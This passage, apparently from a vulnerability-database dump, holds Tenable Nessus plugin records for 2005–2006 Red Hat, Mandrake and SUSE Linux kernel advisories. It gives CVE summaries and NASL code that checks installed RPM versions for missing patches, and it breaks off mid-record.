70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0101. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20732);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2002-2185\", \"CVE-2004-1190\", \"CVE-2005-2458\", \"CVE-2005-2709\", \"CVE-2005-2800\", \"CVE-2005-3044\", \"CVE-2005-3106\", \"CVE-2005-3109\", \"CVE-2005-3276\", \"CVE-2005-3356\", \"CVE-2005-3358\", \"CVE-2005-3784\", \"CVE-2005-3806\", \"CVE-2005-3848\", \"CVE-2005-3857\", \"CVE-2005-3858\", \"CVE-2005-4605\");\n script_xref(name:\"RHSA\", value:\"2006:0101\");\n\n script_name(english:\"RHEL 4 : kernel (RHSA-2006:0101)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix several security issues in the Red\nHat Enterprise Linux 4 kernel are now available.\n\nThis security advisory has been rated as having important security\nimpact by the Red Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the security issues\ndescribed below :\n\n - a flaw in network IGMP processing that a allowed a\n remote user on the local network to cause a denial of\n service (disabling of multicast reports) if the system\n is running multicast applications (CVE-2002-2185,\n moderate)\n\n - a flaw which allowed a local user to write to firmware\n on read-only opened /dev/cdrom devices (CVE-2004-1190,\n moderate)\n\n - a flaw in gzip/zlib handling internal to the kernel that\n may allow a local user to cause a denial of service\n (crash) (CVE-2005-2458, low)\n\n - a flaw in procfs handling during unloading of modules\n that allowed a local user to cause a denial of service\n or potentially gain privileges (CVE-2005-2709, moderate)\n\n - a flaw in the SCSI procfs interface that allowed a local\n user to cause a denial of service (crash)\n (CVE-2005-2800, moderate)\n\n - a flaw in 32-bit-compat handling of the TIOCGDEV ioctl\n that allowed a local user to cause a denial of service\n (crash) (CVE-2005-3044, important)\n\n - a race condition when threads share memory mapping that\n allowed local users to cause a denial of service\n (deadlock) (CVE-2005-3106, important)\n\n - a flaw when trying to mount a non-hfsplus filesystem\n using hfsplus that allowed local users to cause a denial\n of service (crash) (CVE-2005-3109, moderate)\n\n - a minor info leak with the get_thread_area() syscall\n that allowed a local user to view uninitialized kernel\n stack data (CVE-2005-3276, low)\n\n - a flaw in mq_open system call that allowed a local user\n to cause a denial of service (crash) (CVE-2005-3356,\n important)\n\n - a flaw in set_mempolicy that allowed a local user on\n some 64-bit architectures to cause a denial of service\n (crash) (CVE-2005-3358, important)\n\n - a flaw in the auto-reap of child processes that allowed\n a local user to cause a denial of service (crash)\n (CVE-2005-3784, important)\n\n - a flaw in the IPv6 flowlabel code that allowed a local\n user to cause a denial of service (crash)\n (CVE-2005-3806, important)\n\n - a flaw in network ICMP processing that allowed a local\n user to cause a denial of service (memory exhaustion)\n (CVE-2005-3848, important)\n\n - a flaw in file lease time-out handling that allowed a\n local user to cause a denial of service (log file\n overflow) (CVE-2005-3857, moderate)\n\n - a flaw in network IPv6 xfrm handling that allowed a\n local user to cause a denial of service (memory\n exhaustion) (CVE-2005-3858, important)\n\n - a flaw in procfs handling that allowed a local user to\n read kernel memory (CVE-2005-4605, important)\n\nAll Red Hat Enterprise Linux 4 users are advised to upgrade their\nkernels to the packages associated with their machine architectures\nand configurations as listed in this erratum.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2002-2185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-1190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2458\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2800\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3044\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3106\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3109\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3276\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3356\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3358\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3784\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3848\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3857\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3858\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-4605\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2006:0101\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-hugemem-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2002-2185\", \"CVE-2004-1190\", \"CVE-2005-2458\", \"CVE-2005-2709\", \"CVE-2005-2800\", \"CVE-2005-3044\", \"CVE-2005-3106\", \"CVE-2005-3109\", \"CVE-2005-3276\", \"CVE-2005-3356\", \"CVE-2005-3358\", \"CVE-2005-3784\", \"CVE-2005-3806\", \"CVE-2005-3848\", \"CVE-2005-3857\", \"CVE-2005-3858\", \"CVE-2005-4605\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2006:0101\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2006:0101\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"kernel-2.6.9-22.0.2.EL\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"kernel-devel-2.6.9-22.0.2.EL\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"kernel-doc-2.6.9-22.0.2.EL\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-hugemem-2.6.9-22.0.2.EL\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-hugemem-devel-2.6.9-22.0.2.EL\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-smp-2.6.9-22.0.2.EL\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-smp-2.6.9-22.0.2.EL\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-smp-devel-2.6.9-22.0.2.EL\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-smp-devel-2.6.9-22.0.2.EL\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-devel / kernel-doc / kernel-hugemem / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T11:51:31", "description": "A number of vulnerabilities have been corrected in the Linux kernel :\n\nA race condition in the 2.6 kernel could allow a local user to cause a\nDoS by triggering a core dump in one thread while another thread has a\npending SIGSTOP (CVE-2005-3527).\n\nThe ptrace functionality in 2.6 kernels prior to 2.6.14.2, using\nCLONE_THREAD, does not use the thread group ID to check whether it is\nattaching to itself, which could allow local users to cause a DoS\n(CVE-2005-3783).\n\nThe auto-reap child process in 2.6 kernels prior to 2.6.15 include\nprocesses with ptrace attached, which leads to a dangling ptrace\nreference and allows local users to cause a crash (CVE-2005-3784).\n\nA locking problem in the POSIX timer cleanup handling on exit on\nkernels 2.6.10 to 2.6.14 when running on SMP systems, allows a local\nuser to cause a deadlock involving process CPU timers (CVE-2005-3805).\n\nThe IPv6 flowlabel handling code in 2.4 and 2.6 kernels prior to\n2.4.32 and 2.6.14 modifes the wrong variable in certain circumstances,\nwhich allows local users to corrupt kernel memory or cause a crash by\ntriggering a free of non-allocated memory (CVE-2005-3806).\n\nAn integer overflow in 2.6.14 and earlier could allow a local user to\ncause a hang via 64-bit mmap calls that are not properly handled on a\n32-bit system (CVE-2005-3808).\n\nAs well, other bugfixes are included in this update :\n\nFixes to swsup and HDA sound fixes (DMA buffer fixes, and fixes for\nthe AD1986a codec, added support for Nvidia chipsets, and new model\ninformation for the Gigabyte K8N51).\n\nMCP51 forcedeth support has been added.", "edition": 24, "published": "2006-01-22T00:00:00", "title": "Mandrake Linux Security Advisory : kernel (MDKSA-2006:018)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3784", "CVE-2005-3783", "CVE-2005-3805", "CVE-2005-3527", "CVE-2005-3806", "CVE-2005-3808"], "modified": "2006-01-22T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:kernel-2.6.12.15mdk", "p-cpe:/a:mandriva:linux:kernel-i586-up-1GB-2.6.12.15mdk", "p-cpe:/a:mandriva:linux:kernel-xenU-2.6.12.15mdk", "p-cpe:/a:mandriva:linux:kernel-source-2.6", "p-cpe:/a:mandriva:linux:kernel-source-stripped-2.6", "cpe:/o:mandriva:linux:2006", "p-cpe:/a:mandriva:linux:kernel-i686-up-4GB-2.6.12.15mdk", "p-cpe:/a:mandriva:linux:kernel-xbox-2.6.12.15mdk", "p-cpe:/a:mandriva:linux:kernel-xen0-2.6.12.15mdk", "p-cpe:/a:mandriva:linux:kernel-smp-2.6.12.15mdk"], "id": "MANDRAKE_MDKSA-2006-018.NASL", "href": "https://www.tenable.com/plugins/nessus/20796", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2006:018. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20796);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-3527\", \"CVE-2005-3783\", \"CVE-2005-3784\", \"CVE-2005-3805\", \"CVE-2005-3806\", \"CVE-2005-3808\");\n script_xref(name:\"MDKSA\", value:\"2006:018\");\n\n script_name(english:\"Mandrake Linux Security Advisory : kernel (MDKSA-2006:018)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A number of vulnerabilities have been corrected in the Linux kernel :\n\nA race condition in the 2.6 kernel could allow a local user to cause a\nDoS by triggering a core dump in one thread while another thread has a\npending SIGSTOP (CVE-2005-3527).\n\nThe ptrace functionality in 2.6 kernels prior to 2.6.14.2, using\nCLONE_THREAD, does not use the thread group ID to check whether it is\nattaching to itself, which could allow local users to cause a DoS\n(CVE-2005-3783).\n\nThe auto-reap child process in 2.6 kernels prior to 2.6.15 include\nprocesses with ptrace attached, which leads to a dangling ptrace\nreference and allows local users to cause a crash (CVE-2005-3784).\n\nA locking problem in the POSIX timer cleanup handling on exit on\nkernels 2.6.10 to 2.6.14 when running on SMP systems, allows a local\nuser to cause a deadlock involving process CPU timers (CVE-2005-3805).\n\nThe IPv6 flowlabel handling code in 2.4 and 2.6 kernels prior to\n2.4.32 and 2.6.14 modifes the wrong variable in certain circumstances,\nwhich allows local users to corrupt kernel memory or cause a crash by\ntriggering a free of non-allocated memory (CVE-2005-3806).\n\nAn integer overflow in 2.6.14 and earlier could allow a local user to\ncause a hang via 64-bit mmap calls that are not properly handled on a\n32-bit system (CVE-2005-3808).\n\nAs well, other bugfixes are included in this update :\n\nFixes to swsup and HDA sound fixes (DMA buffer fixes, and fixes for\nthe AD1986a codec, added support for Nvidia chipsets, and new model\ninformation for the Gigabyte K8N51).\n\nMCP51 forcedeth support has been added.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-2.6.12.15mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-i586-up-1GB-2.6.12.15mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-i686-up-4GB-2.6.12.15mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-smp-2.6.12.15mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source-2.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source-stripped-2.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-xbox-2.6.12.15mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-xen0-2.6.12.15mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-xenU-2.6.12.15mdk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2006.0\", reference:\"kernel-2.6.12.15mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"kernel-i586-up-1GB-2.6.12.15mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"kernel-i686-up-4GB-2.6.12.15mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"kernel-smp-2.6.12.15mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"kernel-source-2.6-2.6.12-15mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"kernel-source-stripped-2.6-2.6.12-15mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"kernel-xbox-2.6.12.15mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"kernel-xen0-2.6.12.15mdk-1-1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"kernel-xenU-2.6.12.15mdk-1-1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.6, "vector": "AV:L/AC:L/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2021-01-17T14:14:46", "description": "The remote host is missing the patch for the advisory SUSE-SA:2005:068 (kernel).\n\n\nThe Linux kernel was updated to fix several security problems and\nseveral bugs, listed below:\n\nSecurity fixes:\n- CVE-2005-3783: A check in ptrace(2) handling that finds out if\na process is attaching to itself was incorrect and could be used\nby a local attacker to crash the machine. (All)\n\n- CVE-2005-3784: A check in reaping of terminating child processes did\nnot consider ptrace(2) attached processes and would leave a ptrace\nreference dangling. This could lead to a local user being able to\ncrash the machine. (Linux kernel 2.6 based products only)\n\n- CVE-2005-3806: A bug in IPv6 flow label handling code could be used\nby a local attacker to free non-allocated memory and in turn corrupt\nkernel memory and likely crash the machine. (All)\n\n- CVE-2005-3805: A locking problem in POSIX timer handling could\nbe used by a local attacker on a SMP system to deadlock the\nmachine. (SUSE Linux 9.3)\n\n- CVE-2005-3527: A race condition in do_coredump in signal.c allows\nlocal users to cause a denial of service (machine hang) by\ntriggering a core dump in one thread while another thread has a\npending SIGSTOP. (SUSE Linux 9.3)\n\n- CVE-2005-3807: A memory kernel leak in VFS lease handling can exhaust\nthe machine memory and so cause a local denial of service. This\nis seen in regular Samba use and could also be triggered by local\nattackers. (SUSE Linux 9.3)\n\n- Others: see original advisory", "edition": 5, "published": "2005-12-20T00:00:00", "title": "SUSE-SA:2005:068: kernel", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3784", "CVE-2005-3783", "CVE-2005-3805", "CVE-2005-3807", "CVE-2005-3527", "CVE-2005-3806"], "modified": "2005-12-20T00:00:00", "cpe": [], "id": "SUSE_SA_2005_068.NASL", "href": "https://www.tenable.com/plugins/nessus/20334", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2005:068\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(20334);\n script_version(\"1.9\");\n \n name[\"english\"] = \"SUSE-SA:2005:068: kernel\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2005:068 (kernel).\n\n\nThe Linux kernel was updated to fix several security problems and\nseveral bugs, listed below:\n\nSecurity fixes:\n- CVE-2005-3783: A check in ptrace(2) handling that finds out if\na process is attaching to itself was incorrect and could be used\nby a local attacker to crash the machine. (All)\n\n- CVE-2005-3784: A check in reaping of terminating child processes did\nnot consider ptrace(2) attached processes and would leave a ptrace\nreference dangling. This could lead to a local user being able to\ncrash the machine. (Linux kernel 2.6 based products only)\n\n- CVE-2005-3806: A bug in IPv6 flow label handling code could be used\nby a local attacker to free non-allocated memory and in turn corrupt\nkernel memory and likely crash the machine. (All)\n\n- CVE-2005-3805: A locking problem in POSIX timer handling could\nbe used by a local attacker on a SMP system to deadlock the\nmachine. (SUSE Linux 9.3)\n\n- CVE-2005-3527: A race condition in do_coredump in signal.c allows\nlocal users to cause a denial of service (machine hang) by\ntriggering a core dump in one thread while another thread has a\npending SIGSTOP. (SUSE Linux 9.3)\n\n- CVE-2005-3807: A memory kernel leak in VFS lease handling can exhaust\nthe machine memory and so cause a local denial of service. This\nis seen in regular Samba use and could also be triggered by local\nattackers. (SUSE Linux 9.3)\n\n- Others: see original advisory\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/advisories/2005_68_kernel.html\" );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\" );\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/12/20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the kernel package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"Intel-536ep-4.62-27\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"Intel-v92ham-4.53-27\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"k_athlon-2.4.21-303\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"k_deflt-2.4.21-303\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"k_smp-2.4.21-303\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"k_smp4G-2.4.21-303\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"k_um-2.4.21-303\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-source-2.4.21-303\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"ltmodem-8.26a-216\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-bigsmp-2.6.5-7.202.7\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-default-2.6.5-7.202.7\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-smp-2.6.5-7.202.7\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-source-2.6.5-7.202.7\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-syms-2.6.5-7.202.7\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"ltmodem-2.6.2-38.19\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-docs-2.6.5-7.202.7\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"Intel-536ep-4.69-5.12\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-bigsmp-2.6.8-24.19\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-bigsmp-nongpl-2.6.8-24.19\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-default-2.6.8-24.19\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-default-nongpl-2.6.8-24.19\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-smp-2.6.8-24.19\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-smp-nongpl-2.6.8-24.19\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-source-2.6.8-24.19\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-syms-2.6.8-24.19\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-um-2.6.8-24.19\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-um-nongpl-2.6.8-24.19\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"ltmodem-8.31a8-6.12\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"um-host-install-initrd-1.0-48.11\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"um-host-kernel-2.6.8-24.19\", 